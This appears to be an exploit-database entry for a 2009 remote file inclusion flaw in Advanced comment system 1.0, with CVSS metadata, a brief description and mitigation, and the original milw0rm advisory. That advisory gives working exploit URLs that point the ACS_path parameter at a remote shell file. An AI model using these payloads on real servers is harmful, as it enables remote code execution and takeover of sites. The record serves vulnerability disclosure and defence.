Advanced comment system1.0 Remote File Inclusion Vulnerability

vendor:

Advanced comment system

by:

kurdish hackers team

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Advanced comment system

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Advanced comment system1.0 Remote File Inclusion Vulnerability

Advanced comment system 1.0 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable script. This malicious URL can be used to execute arbitrary code on the vulnerable server. The vulnerable script is 'index.php' and 'admin.php' located in the 'advanced_comment_system' directory. The malicious URL should contain the path to the malicious file which will be executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to validate the user input and filter out any malicious code. Also, the web application should be kept up to date with the latest security patches.

Source

Exploit-DB raw data:

======================================================

 Advanced comment system1.0  Remote File Inclusion Vulnerability


<<!>> Found by  :  kurdish hackers team

<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team

<<!>> site   : www.kurdteam.org

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   ::  Advanced_comment_system_1-0

<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit ::
 
 >>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
                                   /advanced_comment_system/admin.php?ACS_path=[shell.txt?]


=======================================================
 
=======================================================

<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team

# milw0rm.com [2009-09-10]